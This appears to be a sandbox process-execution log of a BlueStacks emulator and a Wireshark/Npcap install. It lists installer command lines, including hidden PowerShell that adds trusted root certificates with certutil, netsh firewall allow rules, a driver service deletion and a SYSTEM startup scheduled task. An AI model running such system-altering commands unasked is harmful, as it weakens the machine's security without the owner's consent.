tasklist /FI "USERNAME eq Admin" /FI "IMAGENAME eq BlueStacksServices.exe"
C:\Windows\SysWOW64\find.exe
find "BlueStacksServices.exe"
C:\Users\Admin\AppData\Local\Programs\bluestacks-services\BlueStacksServices.exe
"C:\Users\Admin\AppData\Local\Programs\bluestacks-services\BlueStacksServices.exe" --hidden --initialLaunch
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=126 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=127 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10616 /prefetch:1
C:\Users\Admin\AppData\Local\Programs\bluestacks-services\BlueStacksServices.exe
"C:\Users\Admin\AppData\Local\Programs\bluestacks-services\BlueStacksServices.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\bluestacks-services" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1640 --field-trial-handle=1752,i,6523308688860315722,5279011738345694822,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
C:\Windows\system32\cscript.exe
cscript.exe
C:\Users\Admin\AppData\Local\Programs\bluestacks-services\BlueStacksServices.exe
"C:\Users\Admin\AppData\Local\Programs\bluestacks-services\BlueStacksServices.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\bluestacks-services" --mojo-platform-channel-handle=1996 --field-trial-handle=1752,i,6523308688860315722,5279011738345694822,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
C:\Windows\system32\cscript.exe
cscript.exe //Nologo C:\Users\Admin\AppData\Local\Programs\bluestacks-services\resources\regedit\vbs\regList.wsf A HKCU\SOFTWARE\BlueStacksServices
C:\Windows\system32\cscript.exe
cscript.exe //Nologo C:\Users\Admin\AppData\Local\Programs\bluestacks-services\resources\regedit\vbs\regList.wsf A HKCU\SOFTWARE\BlueStacksServices
C:\Windows\system32\cscript.exe
cscript.exe //Nologo C:\Users\Admin\AppData\Local\Programs\bluestacks-services\resources\regedit\vbs\regPutValue.wsf A
C:\Windows\system32\cscript.exe
cscript.exe //Nologo C:\Users\Admin\AppData\Local\Programs\bluestacks-services\resources\regedit\vbs\regPutValue.wsf A
C:\Windows\system32\cscript.exe
cscript.exe //Nologo C:\Users\Admin\AppData\Local\Programs\bluestacks-services\resources\regedit\vbs\regList.wsf A "HKCU\SOFTWARE\BlueStacks X"
C:\Users\Admin\AppData\Local\Programs\bluestacks-services\BlueStacksServices.exe
"C:\Users\Admin\AppData\Local\Programs\bluestacks-services\BlueStacksServices.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\bluestacks-services" --app-user-model-id=com.bluestacks.services --app-path="C:\Users\Admin\AppData\Local\Programs\bluestacks-services\resources\app.asar" --enable-sandbox --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2580 --field-trial-handle=1752,i,6523308688860315722,5279011738345694822,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\cscript.exe
cscript.exe //Nologo C:\Users\Admin\AppData\Local\Programs\bluestacks-services\resources\regedit\vbs\regList.wsf A "HKCU\SOFTWARE\BlueStacks X"
C:\Windows\system32\cscript.exe
cscript.exe //Nologo C:\Users\Admin\AppData\Local\Programs\bluestacks-services\resources\regedit\vbs\regList.wsf A "HKCU\SOFTWARE\BlueStacks X"
C:\Windows\system32\cscript.exe
cscript.exe //Nologo C:\Users\Admin\AppData\Local\Programs\bluestacks-services\resources\regedit\vbs\regList.wsf A "HKCU\SOFTWARE\BlueStacks X"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe" 1 2
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe" 4 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\cscript.exe
cscript.exe //Nologo C:\Users\Admin\AppData\Local\Programs\bluestacks-services\resources\regedit\vbs\regList.wsf A HKLM\SOFTWARE\BlueStacks_nxt
C:\Windows\system32\cscript.exe
cscript.exe //Nologo C:\Users\Admin\AppData\Local\Programs\bluestacks-services\resources\regedit\vbs\regList.wsf A HKLM\SOFTWARE\BlueStacks_nxt
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe" 2 2
C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe" 1 1
C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe" 4 1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=129 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe" 2 1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=10920 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-CheckCpu.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-CheckCpu.exe" --cmd checkSSE4
C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe" x "C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\PF.zip" -o"C:\Program Files\BlueStacks_nxt" -aoa
C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\\HD-GLCheck.exe" 2
C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\\HD-GLCheck.exe" 3
C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\\HD-GLCheck.exe" 1
C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe" x "C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\QtRedistx64.zip" -o"C:\Program Files\BlueStacks_nxt" -aoa
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe" x "C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\PD.zip" -o"F:\BlueStacks_nxt" -aoa
C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe" x "F:\Pie64_5.14.22.1003.exe" -o"F:\BlueStacks_nxt\Engine\Pie64" -aoa
C:\Windows\system32\cscript.exe
cscript.exe //Nologo C:\Users\Admin\AppData\Local\Programs\bluestacks-services\resources\regedit\vbs\regList.wsf A "HKCU\SOFTWARE\BlueStacks X"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\cscript.exe
cscript.exe //Nologo C:\Users\Admin\AppData\Local\Programs\bluestacks-services\resources\regedit\vbs\regList.wsf A HKLM\SOFTWARE\BlueStacks_nxt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cscript.exe
cscript.exe //Nologo C:\Users\Admin\AppData\Local\Programs\bluestacks-services\resources\regedit\vbs\regList.wsf A "HKCU\SOFTWARE\BlueStacks X"
C:\Windows\system32\cscript.exe
cscript.exe //Nologo C:\Users\Admin\AppData\Local\Programs\bluestacks-services\resources\regedit\vbs\regList.wsf A HKLM\SOFTWARE\BlueStacks_nxt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe
"C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\SYSTEM32\netsh.exe
"netsh.exe" advfirewall firewall delete rule name="BlueStacks Service"
C:\Windows\SYSTEM32\netsh.exe
"netsh.exe" advfirewall firewall add rule name="BlueStacks Service" dir=in action=allow program="C:\Program Files\BlueStacks_nxt\HD-Player.exe" enable=yes
C:\Windows\SYSTEM32\netsh.exe
"netsh.exe" advfirewall firewall delete rule name="BlueStacksAppplayerWeb"
C:\Windows\SYSTEM32\netsh.exe
"netsh.exe" advfirewall firewall add rule name="BlueStacksAppplayerWeb" dir=in action=allow program="C:\Program Files\BlueStacks_nxt\BlueStacksAppplayerWeb.exe" enable=yes
C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-CheckCpu.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-CheckCpu.exe" --cmd checkSSE3
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c "sc.exe delete BlueStacksDrv_nxt"
C:\Windows\system32\sc.exe
sc.exe delete BlueStacksDrv_nxt
C:\Windows\SYSTEM32\reg.exe
"reg.exe" EXPORT HKLM\Software\BlueStacks_nxt "C:\Users\Admin\AppData\Local\Temp\3lvshmuz.hpv\RegHKLM.txt"
C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe" a "C:\Users\Admin\AppData\Local\Temp\Installer.zip" -m0=LZMA:a=1 "C:\Users\Admin\AppData\Local\Temp\3lvshmuz.hpv\*"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Program Files\Wireshark\vc_redist.x64.exe
"C:\Program Files\Wireshark\vc_redist.x64.exe" /install /quiet /norestart
C:\Windows\Temp\{F5A019B8-964A-4BC1-9E94-4827D0A6559D}\.cr\vc_redist.x64.exe
"C:\Windows\Temp\{F5A019B8-964A-4BC1-9E94-4827D0A6559D}\.cr\vc_redist.x64.exe" -burn.clean.room="C:\Program Files\Wireshark\vc_redist.x64.exe" -burn.filehandle.attached=576 -burn.filehandle.self=572 /install /quiet /norestart
C:\Windows\Temp\{C171BC14-EBD8-4819-A425-1258F93C1075}\.be\VC_redist.x64.exe
"C:\Windows\Temp\{C171BC14-EBD8-4819-A425-1258F93C1075}\.be\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{4E78029C-91BB-4449-AC86-7726A625D95F} {0F043694-806C-4425-9599-79D1FD9F7CDE} 6320
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe
"C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={8bdfe669-9705-4184-9368-db9ce581e0e7} -burn.filehandle.self=1088 -burn.embedded BurnPipe.{463D93A8-3567-4F21-B8C9-CBC06DA677A9} {2B4FF168-7B6E-43AE-B673-9E2EA4A45AB3} 6744
C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe
"C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe" -burn.clean.room="C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe" -burn.filehandle.attached=544 -burn.filehandle.self=568 -uninstall -quiet -burn.related.upgrade -burn.ancestors={8bdfe669-9705-4184-9368-db9ce581e0e7} -burn.filehandle.self=1088 -burn.embedded BurnPipe.{463D93A8-3567-4F21-B8C9-CBC06DA677A9} {2B4FF168-7B6E-43AE-B673-9E2EA4A45AB3} 6744
C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe
"C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{62853DDC-EFB6-49EC-80FA-E98026F90765} {C5506270-82A3-4715-8651-7B73463817C0} 3416
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Program Files\Wireshark\npcap-1.78.exe
"C:\Program Files\Wireshark\npcap-1.78.exe" /winpcap_mode=no /loopback_support=no
C:\Users\Admin\AppData\Local\Temp\nsiBB98.tmp\NPFInstall.exe
"C:\Users\Admin\AppData\Local\Temp\nsiBB98.tmp\NPFInstall.exe" -n -check_dll
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -WindowStyle Hidden -NonInteractive -Command "Get-ChildItem Cert:\LocalMachine\Root | Where-Object {$_.Thumbprint -eq '0563b8630d62d75abbc8ab1e4bdfb5a899b24d43'} | Sort-Object -Descending -Property FriendlyName | Select-Object -Skip 1 | Remove-Item"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -WindowStyle Hidden -NonInteractive -Command "If (Get-ChildItem Cert:\LocalMachine\Root\0563b8630d62d75abbc8ab1e4bdfb5a899b24d43){certutil.exe -verifystore 'Root' '0563b8630d62d75abbc8ab1e4bdfb5a899b24d43';If($LASTEXITCODE -ne 0){Remove-Item Cert:\LocalMachine\Root\0563b8630d62d75abbc8ab1e4bdfb5a899b24d43}}"
C:\Windows\SysWOW64\certutil.exe
"C:\Windows\system32\certutil.exe" -verifystore Root 0563b8630d62d75abbc8ab1e4bdfb5a899b24d43
C:\Windows\SysWOW64\certutil.exe
certutil.exe -verifystore "Root" "0563b8630d62d75abbc8ab1e4bdfb5a899b24d43"
C:\Windows\SysWOW64\certutil.exe
certutil.exe -addstore -f "Root" "C:\Users\Admin\AppData\Local\Temp\nsiBB98.tmp\0563b8630d62d75abbc8ab1e4bdfb5a899b24d43.sst"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -WindowStyle Hidden -NonInteractive -Command "Get-ChildItem Cert:\LocalMachine\Root | Where-Object {$_.Thumbprint -eq '5fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25'} | Sort-Object -Descending -Property FriendlyName | Select-Object -Skip 1 | Remove-Item"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -WindowStyle Hidden -NonInteractive -Command "If (Get-ChildItem Cert:\LocalMachine\Root\5fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25){certutil.exe -verifystore 'Root' '5fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25';If($LASTEXITCODE -ne 0){Remove-Item Cert:\LocalMachine\Root\5fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25}}"
C:\Windows\SysWOW64\certutil.exe
"C:\Windows\system32\certutil.exe" -verifystore Root 5fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25
C:\Windows\SysWOW64\certutil.exe
certutil.exe -verifystore "Root" "5fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25"
C:\Windows\SysWOW64\certutil.exe
certutil.exe -addstore -f "Root" "C:\Users\Admin\AppData\Local\Temp\nsiBB98.tmp\5fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25.sst"
C:\Windows\SysWOW64\certutil.exe
certutil.exe -addstore -f "TrustedPublisher" "C:\Users\Admin\AppData\Local\Temp\nsiBB98.tmp\signing.p7b"
C:\Program Files\Npcap\NPFInstall.exe
"C:\Program Files\Npcap\NPFInstall.exe" -n -c
C:\Windows\SYSTEM32\pnputil.exe
pnputil.exe -e
C:\Program Files\Npcap\NPFInstall.exe
"C:\Program Files\Npcap\NPFInstall.exe" -n -iw
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Program Files\Npcap\NPFInstall.exe
"C:\Program Files\Npcap\NPFInstall.exe" -n -i
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{afb04057-49f7-6643-bf63-8e1654ebcf92}\NPCAP.inf" "9" "405306be3" "000000000000014C" "WinSta0\Default" "000000000000015C" "208" "C:\Program Files\Npcap"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -WindowStyle Hidden -NonInteractive -Command "Microsoft.PowerShell.Management\Start-Service -Name npcap -PassThru | Microsoft.PowerShell.Management\Stop-Service -PassThru | Microsoft.PowerShell.Management\Start-Service"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -WindowStyle Hidden -NonInteractive -Command "ScheduledTasks\Register-ScheduledTask -Force -TaskName 'npcapwatchdog' -Description 'Ensure Npcap service is configured to start at boot' -Action (ScheduledTasks\New-ScheduledTaskAction -Execute 'C:\Program Files\Npcap\CheckStatus.bat') -Principal (ScheduledTasks\New-ScheduledTaskPrincipal -UserId 'SYSTEM' -LogonType ServiceAccount) -Trigger (ScheduledTasks\New-ScheduledTaskTrigger -AtStartup) -Settings (ScheduledTasks\New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Compatibility Win8)"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=131 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1348 /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
